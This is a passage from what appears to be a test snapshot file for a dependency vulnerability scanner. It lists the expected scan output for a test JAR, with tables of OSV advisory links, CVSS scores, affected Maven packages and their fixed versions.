2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 
9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | 
testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | 
Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | 
+-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | Uncalled vulnerabilities | | | | | | | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis - 2] --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher - 1] Scanning dir ./testdata/artifact/javareach_test.jar Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Total 8 packages affected by 61 known vulnerabilities (18 Critical, 32 High, 8 Medium, 3 Low, 0 Unknown) from 1 ecosystem. 60 vulnerabilities can be fixed. +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | 
| https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | 
com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | 
testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | 
Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | 
https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher - 2] --- [TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis - 1] Scanning dir ./testdata/artifact/javareach_test.jar Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 8 packages affected by 61 known vulnerabilities (18 Critical, 32 High, 8 Medium, 3 Low, 0 Unknown) from 1 ecosystem. 60 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar 
| | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | 
com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 